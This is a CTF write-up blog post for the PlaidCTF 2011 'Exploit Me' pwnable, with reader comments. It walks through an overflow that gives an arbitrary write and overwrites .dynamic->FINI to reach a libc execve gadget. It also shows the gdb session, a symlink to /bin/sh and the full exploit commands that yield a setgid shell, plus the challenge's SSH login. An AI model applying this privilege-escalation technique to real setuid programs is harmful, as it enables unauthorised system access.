PlaidCTF 2011 #23 – Exploit Me :p (200)

Category: pwnables

It seems like AED also has some plans to raise hacker force!
We found this binary as an exploitation practice program in the office, but they forgot to remove the setgid flag on the program.
So we can get the secret key!

ssh username@a5.amalgamated.biz

Username: exp_1
Password: jNKpzFuRLpsIW9xzqNIpCVF1

Summary: .dynamic->FINI overwriting, execl symlink


This is the only function of the program (main only does atoi of 2nd and 3rd arguments):

void __cdecl sub_8048575(const char *argv1,
int argv2atoi, size_t argv3atoi)
  char v3; // [sp+10h] [bp-5Ch]@2
  size_t v4; // [sp+50h] [bp-1Ch]@2

  if ( argv3atoi <= 71 )
    v4 = argv3atoi;
    strncpy(&v3, argv1, argv3atoi);
    if ( v4 )
      *v4 = argv2atoi;

Ok, we can overwrite v4 variable, and, because it’s used as a pointer, we can overwrite arbitrary address. What we should overwrite? One my tool showed that dtors are a bad case, but luckily, .dynamic->FINI is ok:

exploitme $ elfinfo exploitme
Info for 'exploitme':
   i DYNAMIC SECTION: 0x80496f4 RW
   + DYNAMIC most probably IS writeable at runtime
   i FINI: 0x8049708
   - STACK IS NOT executable
   i DTORS 0x80496e8 WA, next 0x80496ec [ffffffff00000000]
   - DTORS are not working, bad style found

So, we will overwrite 0x8049708 to whatever-we-want. Let’s put there smth and look what arguments are passed:

exp_1@a5:~$ ulimit -s unlimited  # disable libc ASLR
exp_1@a5:~$ gdb --args /opt/pctf/exploit/exploitMe "`perl -e 'print
"A"x64 . "\x08\x97\x04\x08";'`" "`perl -e 'print 0x41424344'`" 71
(gdb) r
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) x/20xw $esp
0xbfefbcbc:    0x4000e226    0x4001c4e4    0x00000000    0x00000000
(gdb) x/1s 0x4001c4e4
0x4001c4e4 <_rtld_global+1220>:     ""

Oh no, empty string :( Luckily, there are lot of gadgets calling execve in libc, and I found an appropriate one:

(gdb) x/2i &execl-12
0x400bcb54 <execle+324>:    mov    %eax,(%esp)
0x400bcb57 <execle+327>:    call   0x400bc870 <execve>
(gdb) p/x $eax
$1 = 0x41424344
(gdb) x/1s &execl-12
0x400bcb54 <execle+324>: "\211\004$\350\024\375\377\377뇐\220UW

Ok, now we just create a symlink to /bin/sh (No arguments are passed to him, so no wrapper is needed), and run an exploit:

exp_1@a5:~$ ln -s /bin/sh $'\211\004$\350\024\375\377\377뇐\220UW
exp_1@a5:~$ /opt/pctf/exploit/exploitMe "`perl -e 'print "A"x64 .
"\x08\x97\x04\x08";'`" "`perl -e 'print 0x400bcb54'`" 71
$ id
uid=6001(exp_1) gid=1007(expusers) egid=1008(expkey) groups=1007(expusers)
$ cat /opt/pctf/exploit/key

The flag: K3Ys_t0_15_M1nUtEs_0f_F4mE


  1. Lemon says:

    Большое спасибо за разбор эксплоитов =)
    Расскажите пожалуйста о решении тасков: 2 (Mystery Puzzle 9000), 30 (Sticky Note) и 36 (I’M HUNGRY!..as hell).
    В 2 и 30 у нас был полный фэил с распознаванием, ничего не берёт. А в 36 проблемы, видимо, со слухом. Получили 3х секундную музычку, но разобрать что там поется как-то не получилось, что-то вроде “fuck you ever fuck fuck you”, но система это за ответ есть не стала.

  2. 1tchy says:

    awesome write up !

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>